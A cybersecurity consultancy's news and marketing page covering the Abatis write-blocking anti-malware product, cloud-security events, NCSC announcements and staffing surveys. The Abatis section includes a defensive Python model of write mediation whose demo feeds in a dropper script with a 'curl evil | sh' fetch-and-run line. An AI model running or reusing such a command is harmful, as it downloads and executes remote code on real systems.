  • Up to 40% performance (speed) improvement compared to traditional AV
  • Massive improvement in laptop battery duration


Making Security Management Simple and Cost-Effective

The Central Management Console (CMC) provides facilities to:

  • Install on an estate
  • Retrieve and analyse logs
  • Push policy updates to Abatis individually, in groups or globally
  • Access a web-based application
  • View a SIEM-like dashboard


Abatis is a host-based, software-only solution that is implemented as a kernel driver on Windows platforms. It intercepts and mediates file write access to the computer's permanent storage. It is designed to help enforce system and file integrity without complex management overheads. It achieves this security objective by exercising robust access control over the writing of executable files and user-defined files (protected files) to a computer. It protects against unauthorised modification and denies unauthorised write operations.

While Abatis blocks unwanted executables by default, the Abatis system administrator can define further files for integrity protection according to the computer's role. Ideally, Abatis should be deployed on a newly installed 'clean' operating system. From this secure initial state (the baseline), Abatis prevents malware infection from then on.

In most corporate environments Abatis is rolled out in stages, and there may be extant undetected infections on systems, often referred to as Advanced Persistent Threats (APTs). Abatis' unique mode of operation and extensive audit log allow such malware to be identified: a resident implant that attempts to drop or modify an executable is refused and the attempt is logged. Abatis can also reveal rootkit infections and facilitates the subsequent removal of such programs.
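The policy described above (mediate every write to permanent storage, refuse new or altered executables and changes to administrator-protected files, and keep an audit trail that exposes resident malware trying to persist) can be modelled in user space. The following is an added, illustrative example written for this page; it is not Abatis code and says nothing about how the real driver is implemented. The executable-detection rule (PE, ELF and shebang magic bytes), the process names, the Windows paths and the file contents are all constructed assumptions.

```python
"""Illustrative model of host-based write mediation against an integrity
baseline.  Added example for this page; not Abatis's code or driver logic."""
import hashlib
from dataclasses import dataclass, field

# Assumption: executable content is recognised by its leading magic bytes
# (Windows PE "MZ", Linux ELF, shebang scripts).  Real products use more signals.
EXECUTABLE_MAGIC = (b"MZ", b"\x7fELF", b"#!")


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def is_executable(content: bytes) -> bool:
    """True when the bytes being written look like a program rather than data."""
    return content.startswith(EXECUTABLE_MAGIC)


@dataclass
class WriteMonitor:
    """Mediates every write to permanent storage.

    baseline:  path -> SHA-256 of the file as captured on the clean install
    protected: non-executable files (configs, hosts file) the admin also locks
    audit:     one record per write, allowed or denied, kept for later hunting
    """
    baseline: dict
    protected: set = field(default_factory=set)
    audit: list = field(default_factory=list)

    @classmethod
    def from_clean_image(cls, files: dict, protected=()):
        """Capture the secure initial state from a freshly installed system."""
        return cls({p: sha256(c) for p, c in files.items()}, set(protected))

    def write(self, process: str, path: str, content: bytes, privileged: bool = False) -> bool:
        """Return True if the write is permitted.  Privilege is recorded but never
        bypasses the policy: an admin-level dropper is still refused."""
        unchanged = self.baseline.get(path) == sha256(content)
        if is_executable(content) and not unchanged:
            verdict, reason = False, "executable write outside baseline"
        elif path in self.protected and not unchanged:
            verdict, reason = False, "modification of protected file"
        else:
            verdict, reason = True, "allowed"
        self.audit.append({"process": process, "path": path, "privileged": privileged,
                           "allowed": verdict, "reason": reason})
        return verdict

    def suspects(self) -> set:
        """Processes that tried to drop or alter executables.  On a staged rollout
        these are candidates for an already-resident infection trying to persist."""
        return {r["process"] for r in self.audit
                if not r["allowed"] and r["reason"].startswith("executable")}


def demo() -> dict:
    """Constructed scenario: a clean image, then legitimate and hostile writes."""
    notepad = r"C:\Windows\System32\notepad.exe"
    hosts = r"C:\Windows\System32\drivers\etc\hosts"
    clean = {notepad: b"MZ\x90\x00notepad-image", hosts: b"127.0.0.1 localhost\r\n"}
    mon = WriteMonitor.from_clean_image(clean, protected=[hosts])
    results = {
        # OS repair writing back the identical binary: allowed (hash matches baseline)
        "reinstall_notepad": mon.write("msiexec.exe", notepad, clean[notepad]),
        # user saving a document: allowed (data, not code)
        "save_docx": mon.write("winword.exe", r"C:\Users\bob\Documents\report.docx", b"PK\x03\x04docx"),
        # dropper writing a new PE with admin rights: denied regardless of privilege
        "dropper": mon.write("svchost.exe", r"C:\Users\bob\AppData\Local\Temp\wcry.exe",
                             b"MZ\x90\x00payload", privileged=True),
        # malware redirecting name resolution through the protected hosts file: denied
        "hosts_tamper": mon.write("svchost.exe", hosts, b"1.2.3.4 update.microsoft.com\r\n"),
        # shell script dropped on a Linux host: denied
        "shell_dropper": mon.write("cron", "/tmp/.x/run.sh", b"#!/bin/sh\ncurl evil | sh\n"),
    }
    return {"results": results, "suspects": mon.suspects()}


if __name__ == "__main__":
    out = demo()
    for name, allowed in out["results"].items():
        print(f"{name:18s} {'ALLOW' if allowed else 'DENY'}")
    print("processes to investigate:", sorted(out["suspects"]))
```

The design point is in `write`: the decision never consults `privileged`, which is what "regardless of system privilege" has to mean for a write filter, and the baseline hash is what lets an identical rewrite through while a modified binary is refused. `suspects` shows why the audit log matters on a staged rollout: a pre-existing implant reveals itself the first time it tries to re-drop its payload.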




orange tick.jpg

Securestorm are authorised re-sellers of the award-winning software and management console solution from Abatis, which helps stop malware cost-effectively from the outset.


With Securestorm, you get expert advice, excellent customer care and guidance before and after on-boarding, giving our clients peace of mind and significant savings in cost, time and resources.

To request additional information on malware and ransomware defence tailored to your organisation's infrastructure, budget and constraints, please get in touch via enquiries@securestorm.com or call 0203 8655890 for advice and consultation.



Small Budgets Cripple Cyber Security Efforts of Local Governments



A survey of local government chief information officers finds that insufficient funding for cyber-security is the biggest obstacle in achieving high levels of cyber safety.

Inadequate budgets are the largest obstacle for local government chief information officers in obtaining the highest level of cyber security for their organization, according to a survey released by the International City/County Management Association.

Of the 411 respondents to the Cybersecurity 2016 Survey, 32% reported seeing an increase in cyber attacks on their organisations within the past 12 months. Despite this increase, more than half of the CIOs surveyed said that steep obstacles still stood in the way of achieving the highest possible level of cyber security.

Survey respondents pointed to these reasons as the barriers to obtaining high cyber-security levels:

  • 58% noted inability to pay competitive salaries
  • 53% attributed small cyber-security staff as the main obstacle
  • 52% cited overall lack of funds

Although adequate funding was listed as the top need in achieving the highest level of cyber security for local governments, improved cyber-security policies ranked as No. 2, followed by government employees having a better understanding of cyber-security as No. 3, according to the survey.


"The threat landscape is ever evolving"

Rather than treading over old ground, it's time to step forward and address the ever-widening gap between criminal capability and intent on one side and our capability to defend ourselves on the other. While the National Cyber Security Centre (NCSC) initiatives are in place and taking effect for the long-term goal of securing the nation as a whole, the industry needs to work alongside these measures to ensure progress and continuity as a collective unit.

As NCSC Certified Consultants actively working closely with the Government sector, we strongly believe that:

  • getting the basics right could prevent 85% of breaches
  • moving to a secure culture by actively working with teams will change mindsets
  • measuring that culture periodically will help review and fix gaps
  • sharing information between departments and organisations will unify the common goal of being secure
  • building capability internally will lead to long-term resource, time and cost savings

Securestorm has worked with clients facing constraints in budget, expertise and security culture by offering practical solutions that address the organisation's goals for its overall cyber security. Recently, Securestorm signed a partnership with Edgescan Ltd. to bring a solution that provides the flexibility and efficiency departments facing such hurdles need. Securestorm also offers services to on-board and manage the solution so that internal resources can focus on other organisational priorities. This saves cost, time and resources while providing expertise that can transform the security culture of the whole organisation.

Read about our managed continuous security vulnerability assessment service

Edgescan covers both internal and external vulnerabilities (web applications as well as network infrastructure), including cloud-hosted assets. It also delivers the flexibility, simplicity and manageability that organisations need to take control of cyber security and prevent web and network attacks. Edgescan is a Software-as-a-Service (SaaS) platform designed from the ground up to scale, support the largest enterprises and lower your overall cost of ownership.

As official Edgescan G-Cloud suppliers and certified consultants, Securestorm can offer expert services that help lessen the burden on your security team and improve your overall organisational security posture by:

  • Providing continuous visibility to your on premise and cloud environments
  • Freeing your security team to work on more strategic priorities
  • Satisfying compliance with regulations
  • Safeguarding your critical data
    Presenting Vulnerability Management Service at SOCITM SPRING 2016

    As partners, Securestorm are official G-Cloud Suppliers of the Edgescan solution

Meeting Opportunity: Securestorm & Edgescan at Infosecurity

Securestorm will join Edgescan at Infosecurity Europe, 06-08 June at Olympia, London. Visitors can learn about the full-stack vulnerability management solution.



The Edgescan Vulnerability Assessment & Management by Securestorm is available to procure via the G-Cloud space. The service information can also be found on our own assured service directory 'Informd.Online' with a free registration for Government departments.

To request a trial, or for additional information on the vulnerability assessment and management approach tailored to your organisation's infrastructure, budget and constraints, please get in touch via enquiries@securestorm.com or call 0203 8655890 for advice and consultation.


'Trust in Cloud'


Building Trust in the Security of Cloud


tech-UK represents the companies and technologies that are defining today the world that we will live in tomorrow. More than 900 companies are members of tech-UK. Collectively they employ approximately 700,000 people, about half of all tech sector jobs in the UK.

The event marked the launch of tech-UK's Building Trust in the Security of Cloud papers and a panel discussion with leading cloud industry figures on building trust in the security of cloud computing.

The series of papers are aimed at addressing common trust and security concerns, as well as misconceptions, surrounding cloud services. Despite many years of raising awareness of the benefits offered by cloud computing some negative perceptions remain about the security of cloud services that are holding back cloud adoption and its benefits. Given the importance of cloud computing to the UK’s digital future it is vital that the cloud security messages and advice being delivered today are relevant to how cloud services have evolved, address the concerns being raised by cloud users and are communicated to and understood by the right audiences.

To ensure this happens tech UK has been working with cloud computing and cyber security industry experts to develop a series of papers aimed at providing information and advice for consumers, SMEs and local government leaders that are looking to get the most out of cloud computing. The following papers will be launched and discussed at the event:


Securestorm's Tony Richards, CTO/CISO/Cyber and Cloud Security Strategist, on the panel discussion committee for Building Trust in the Security of Cloud

As tech-UK Member organisation and industry experts, Securestorm directly worked with tech-UK and other industry members to discuss, research and build the cloud topic papers.

Securestorm's Tony Richards, CTO/CISO/Cyber and Cloud Security Strategist, was also involved in the event panel discussion on 24th April 2017 providing insights and answering audience questions on cloud security with relation to Government, Consumers and upcoming challenges such as Brexit and policy changes.

Securestorm are NCSC Certified Cyber Security Consultants with diversified interest in the Cloud Security domain working Public and Private sectors. With experience, knowledge and expertise Securestorm are actively working to champion Cloud Security best practices that enable Govt. & businesses to run more efficiently and cost effectively.

    Highlights from 'Building Trust in Cloud Session'

    Also launched was techUK's "Cloud First. Policy Not Aspiration" paper, which focuses on the importance of the UK Government's Cloud First policy being more than just an aspiration for ensuring effective public sector adoption and usage of cloud, and on how Government can become a loud and vocal cloud champion. The paper makes a number of recommendations that must be taken forward in order to build greater trust in the security of cloud services and increase the adoption of cloud within the public sector. The session discussed these recommendations, the importance of clear roles and responsibilities within organisations for building greater trust and security in cloud computing across both the public and private sectors, and how to take forward techUK's work in this area.

    Access the Cloud papers here:

    About: Securestorm are dynamic cyber security experts who deliver practical advice with the aim of meeting and solving challenges across the Cloud and Cyber Security domains. With a combination of experience, expertise and strategy, Securestorm offers guidance to clients across the Public and Private sectors.
    Securestorm holds several accreditations, notably NCSC Certified Cyber Security Consultancy, Crown Commercial Supplier and ISO 27001. Securestorm is also recognised in the industry for its proven delivery capability.







      SECURESTORM LAUNCHES Informd.online

    Securestorm Ltd., Cloud & Cyber Security Experts and UK National Cyber Security Centre (NCSC) Certified Cyber Security Consultancy have officially launched Informd.online.

    Informd.online is an online Common Technology Service directory for cloud services that have been audited and security-assured by Securestorm against the UK National Cyber Security Centre's (NCSC) Cloud Security Principles. In line with the UK Government's ambition to reduce repetition and share security assurance information between government organisations, Government security representatives can register for an Informd.online account to gain access to the detailed reports.

    Securestorm are NCSC certified for the specialist areas of Information Assurance Audit and Review, Risk Assessment and Risk Management and hold various cloud security credentials further backed up by great industry experience and delivery in the public and private sectors. 

    Informd.online has been developed for referencing assured technology services, allowing users to get an overview, access relevant information and thus make an informed decision on a service's security status. Government users can register for an Informd.online account, giving access to the detailed Cloud Security Principles Assurance Audit Reports.

    Easy Icon-Based Classifications

    Securestorm has designed the directory with custom icons using a traffic-light labelling system to give a security assurance snapshot. The traffic-light system has proven to be a successful model in multiple sectors. Applying this principle, Securestorm has mapped assurance levels (Assured, Not Assured, Weak Assurance and Not Applicable) to categories of importance covering core data types such as Personal Data, Medical Data and Financial Data, as well as security functions such as data location, protection of data in transit, legal jurisdiction, audit, identity and access control, and physical security.


    Friendly & Informative Layout

    Informd.online gives users a holistic overview of a service's security right up front, with detailed service information that is easy to narrow down through our custom assurance icons.


    Readily Available Information

    Clicking on the relevant service allows for accessing general information about the service. Registered Government Account holders get access to a fully detailed and referenced Cloud Security Principles Assurance Audit Report.


                                  Security assurance icon explanation


    Users can navigate the services list and click on the relevant service after shortlisting based on our custom assurance icons

    Users can click on services to pull up descriptions and associated links

    Other Essential Resources from Securestorm

    For more information on Informd.online, feel free to reach out to enquiries@securestorm.com for support or queries. For access to other resources from Securestorm such as Digital Apps, Cloud and Cyber Security guidance articles, thought leadership and case studies, visit www.securestorm.com or navigate our links below.


    You Are Only As Strong As Your Weakest Link… MSPs Under Cyber-Threats.


    The following news story is based on the report published by the NCSC:

    Advice on managing enterprise security published after major cyber campaign detected

    • Third parties who manage large organisations’ IT services attacked
    • NCSC leading investigation in partnership with Cyber Incident Response partners
    • Advice urges enterprise security teams to discuss risk with Managed Service Providers

    TARGETED expert advice aimed at Managed Service Providers and their customers has been published after a global cyber attack was uncovered by a multi-organisation collaboration led by the National Cyber Security Centre (NCSC).

    The attacks are against global Managed Service Providers (MSPs), which are third parties who help to manage large organisations’ IT infrastructure and services. MSPs are particularly attractive to attackers because they have privileged access to other organisations’ systems and data.

    Due to the incident affecting mainly larger organisations, the NCSC believes the risk of direct financial theft from individuals is unlikely.

    The attacks are a reminder of the importance of organisations choosing and monitoring their outsourcing partners carefully, so the NCSC has posted a range of advice on its website about what should be done to mitigate the risks.

    Ciaran Martin, CEO of the government's National Cyber Security Centre, said:

    “This scale of hostile activity is significant and our intervention is aimed at giving the UK the ability to tackle this threat head-on by giving organisations the tools and information they need.

    “We always encourage enterprises to discuss this threat with their MSP, even if they have no reason to believe they have been affected. This incident should remind organisations that entire supply chains need to be managed and they cannot outsource their risk.

    “The response to this attack is an example of the new NCSC at work with our partners. It would not have been possible to uncover the scale and significance of this incident as quickly without our close partners in Cyber Incident Response (CIR) initiative, including PWC and BAE Systems.”

    The guidance reflects the technical advice and mitigation measures offered to U.K. industry and government departments on the Cyber-security Information Sharing Partnership (CISP) platform.

    Organisations that outsource IT infrastructure are recommended to have an open dialogue with their provider and to understand what model it uses to manage their services. If that model is unsatisfactory, the organisation should demand that it be changed immediately.

    The NCSC recommends that MSPs who are unwilling to work closely with customers or are unwilling to share information should be treated with extreme caution. They also advise that having an independent audit of your MSP is critical for security management – an organisation that neglects such monitoring is unlikely to ever be able to effectively manage the risk.

    The NCSC, which is part of GCHQ, is the UK’s technical authority on cyber security. The NCSC was opened by HM The Queen in February 2017 and provides a single, central body for cyber security at a national level. It manages national cyber security incidents, carries out real-time threat analysis and provides tailored sectoral advice. 

    The UK government is fully committed to defending against cyber threats and to addressing the cyber skills gap by developing and growing talent. A five-year National Cyber Security Strategy (NCSS) was announced in November 2016, supported by £1.9 billion of transformational investment.

    Finding Reliable, Trusted & Assured Experts Through NCSC Seal Of Approval

    The NCSC, set up in October 2016, is part of GCHQ and amalgamates government agencies dealing with cyber security. The NCSC was set up to help protect our critical services from cyber attacks, managing major incidents and improve the underlying security of the UK Internet through technological improvement and advice to citizens and organisations. Their vision is to help make the UK the safest place to live and do business online. NCSC certification serves as seal of trust, assurance and reliability for procuring services.

    Certified Cyber Consultancies will have demonstrated to NCSC that they have:

    • a proven track record of delivering defined cyber security consultancy services
    • a level of cyber security expertise supported by professional requirements defined by NCSC
    • the relevant Certified Professional (CCP) qualifications

    and that they:

    • Manage consultancy engagements in accordance with industry good practice
    • Meet NCSC requirements for certified professional cyber services companies

    Certified Cyber Security Consultancies commit to:

    • Complying with a code of conduct (see Section III of the Professional Cyber Services Application form)
    • Maintaining their cyber security expertise


    Securestorm, as an NCSC Certified Cyber Security Consultancy, is one of three companies that specialise in IA Audit and Review. Securestorm can undertake the independent security assurance reviews and IA audits of Managed Service Providers advised by the NCSC in light of this attack. Additionally, Securestorm is certified to carry out Risk Assessment and Risk Management, with experience across Central Government, digital services for Government and the wider public sector.



    UK faces dramatic cyber-security skills 'cliff edge' and is chronically under prepared for hacker attacks, study finds


    "The study finds that only 12 per cent of the UK workforce is under the age of 35 and 53 per cent is over the age of 45"

    A global survey of almost 20,000 security professionals across banks, governments and multinationals concludes that Britain is facing a cyber-security skills “cliff edge” and that companies are “chronically” under-prepared for attacks. 

    The survey, conducted by (ISC)² – a non-profit organisation that aims to educate people about the risks of being online – shows that the UK workforce is getting older which is exacerbating an already gaping cyber-security skills rift. 

    Only 12 per cent of the workforce is under the age of 35 and 53 per cent is over the age of 45, the study finds. 

    A mere 6 per cent of UK companies are recruiting graduates who would have the potential to plug the gap, and 66 per cent already face a cyber-security skills squeeze due to being unable to find qualified personnel. 

    The data also suggest that employers are largely refusing to hire and train inexperienced recruits. A whopping 93 per cent of UK companies that responded to the survey said that previous cyber-security experience is an important factor in their hiring decisions.

    The findings indicate that the skills deficit is already having an effect on British businesses.  

    Close to half of the UK companies questioned said that the shortfall of cyber-security personnel is having a significant impact on their customers. A similar proportion said that it is already causing security breaches. 

     “Industry is experiencing a talent shortfall because employers are too focused on recruiting people with existing cyber-security experience,” said Lucy Chaplin, a manager within KPMG’s financial services technology risk consulting group, commenting on the survey. 

    “[It] is like complaining that there’s a shortage of pilots but refusing to hire anyone who is not already an experienced pilot.” 

    Rob Partridge, head of BT’s Security Academy, said that “the findings confirm that graduates are being overlooked for cyber-security roles and it is now an economic and security imperative that we change this trend”.

    Tuesday’s survey follows a string of similar warnings and a slew of high-profile cyber-attacks that have cost companies both in terms of money and reputation. 

    Last month, a survey by job site Indeed showed that the chasm between supply and demand for cyber-security expertise is widening at an alarming rate. 


    Securestorm agrees that there is a cyber security skills shortage and strongly supports cyber security as part of the educational curriculum, along with enhanced training and support networks, to raise professional standards and tackle the shortfall. This ethos is carried over in our approach of 'investing heavily in people'. We are on the lookout for bright and motivated talent to join our progressive organisation, be inspired and grow within the cyber security market. To see our latest vacancies, visit https://www.securestorm.com/careers/ or write to careers@securestorm.com for more information.


    Securestorm moves to Holborn...



    Waterhouse Square is a large Gothic building of red brick at 138-142 Holborn in the London Borough of Camden. The building is named after Alfred Waterhouse, its original architect.


    The materials are vibrant red brick and terracotta, which give such a large building a hallucinatory quality. The style is unapologetically Victorian Gothic. The central court called 'Waterhouse Square', is accessible from Holborn and is entered from a smaller court under a wide, dramatic arch. Its effect is almost overwhelming.


    You can visit us here -
    WeWork, No. 3 Waterhouse Square
    138 Holborn
    EC1N 2SW
    Telephone: 0203 8655890



    Securestorm get on-board Cyber Security Services 2 Framework by NCSC & CCS


    Securestorm bring Cyber Security Expertise to Cyber Security Services 2 Framework by NCSC & CCS to Meet Public-Sector Needs

    Securestorm, London-based Cloud and Cyber Security experts, Crown Commercial Suppliers, CESG Certified and NCSC Certified Cyber Security Consultants, are to bring their expertise and experience to the latest framework, Cyber Security Services 2, a dynamic-style agreement with the specific aim of helping the public sector buy certified cyber security consultancy and services using an agile approach, starting March 2017.

    The Cyber Security Services 2 Framework is a collaboration between Crown Commercial Service (CCS) and the National Cyber Security Centre (NCSC). This agreement provides a flexible and regulated route for central government and the wider public sector to procure NCSC certified cyber security services. NCSC is the UK government's National Technical Authority for Information Assurance. The agreement is based on the approach detailed in their Cyber Security Standard. It is designed to work in an agile way and to be iterated frequently to benefit buyers and suppliers. Cyber Security Services 2 aims to be the single, central route to market giving Central Government and Wider Public Sector buyers access to cyber security services, with the assurance of NCSC certification, both technically and qualitatively. The services now included are:
            Lot 1: Cyber Consultancy (Risk Assessment, Risk Management, Security Architecture, Audit & Review, Incident Management)
            Lot 2: Penetration Testing
            Lot 3: Incident Response
            Lot 4: Tailored Evaluation

    By successfully getting on-board the new framework and specialising in the Lot 1 offerings as an expert Cyber Consultancy certified by NCSC, Securestorm are experienced and equipped to meet the current needs of public sector organisations, whether they are looking to respond quickly to a cyber-attack or to build long-term cyber resilience. This achievement follows another recent announcement of Securestorm being on-board, live and bringing expertise to the Digital Outcomes and Specialist Framework 2 on the Govt. marketplace starting February 2017. Read about this here.

    For recent case studies visit: https://www.securestorm.com/cyber-security/ or email enquiries@securestorm.com for questions or queries.


       SECURESTORM on-board the ‘DIGITAL OUTCOMES & SPECIALIST 2’ framework


    Securestorm, London based Cloud and Cyber security experts, Crown Commercial Suppliers, CESG Certified and NCSC approved providers, are to bring their expertise and experience to the new framework from the Cabinet Office and Government Digital Services, the Digital Outcomes & Specialist framework, from February 2017.

    Is defining your 'Risk Appetite' important?

    Yes. But is it a simple decision whether to put your head inside a lion's mouth or not? Cyber security risk decisions aren't that straightforward.

    Ultimately, managing your cyber security risk is a trade-off between cost and benefit. But it is a world away from being as simple as whether to put your head in a lion's mouth. A decision about cyber security risk comes down to whether your organisation can manage the risk and therefore reduce it, or can afford to accept the risk and leave it alone for a while. The challenge is that not many organisations have the risk information, decision-making process or risk management capabilities to do this on the fly without first defining their risk appetite. Do you know what your acceptable risk is?

    Many organisations work to reduce their risks and then end up accepting the ones that are too difficult to reduce, or where they cannot see the value in reducing them. The trouble is that if you don't know what level of risk your organisation can tolerate, how can you decide whether to accept them? You absolutely need a clear understanding of what is OK to accept and what is not. Everyone hopes to avoid risks in the first place, then attempts to transfer them to be someone else's problem. What matters, however, is having the capability to reduce them to a level that you are willing to accept as an organisation.

    Many organisations are keen to understand how they will handle a cyber security attack and/or breach and are engaging cyber security organisations to review their business and technical environments. However, you get a better experience and a better answer to the question, "Do we really need to spend this money on fixing this risk?", if you understand and know your organisation's risk appetite. I'm not saying it's a must, but in my opinion it's a sign of real responsibility and maturity towards understanding your cyber security risks and threats.

    Our Approach

    The process is pretty straightforward and it doesn't have to be complex (complex = expensive). We believe in keeping things simple. You can spend lots of money trying to get a perfect answer only to change it 2 months later, or you can get the fundamentals working properly and tweak to optimise it. There are 4 key steps to follow:


    • Better decisions. Being able to make decisions more easily and more accurately around risk treatment is important for balancing cost against benefit when it comes to cyber risk.
    • Better risk management. Being able to manage risk more effectively by fully understanding your tolerances, thresholds and the impact to your assets.
    • Better financial management. Cost-effective spending on cyber security controls and solutions is definitely important, as many organisations are blindly spending money on cyber security without understanding whether there is a benefit or whether they are actually reducing their risks.

    If you would like to know more about this process of defining your Risk Appetite, or would like us to run a free half-day workshop on Risk Appetite Definition, please get in touch (details below).


    About Securestorm: We are a lean, agile and responsive cyber security consultancy that provides practical advice and intelligence with the aim to simplify the world of Cloud and Cyber Security. With a combination of innovation, expertise and strategy, Securestorm brings synergy to the industry.

    About the Writer: As the CEO, Mandeep is the chief planner behind Securestorm’s wheels responsible for steering and implementing all aspects of the sales, marketing and business development to ensure the company’s ongoing success and growth. As a veteran security advisor and business leader, Mandeep has managed multinational clients and is a well-known security expert in the industry who has built his career and reputation on solving clients’ information security, risk and compliance challenges. Mandeep is able to draw from his 20+ years of business and security experience across industry and regularly contributes industry insights, workshops and seminars in the IT security space. 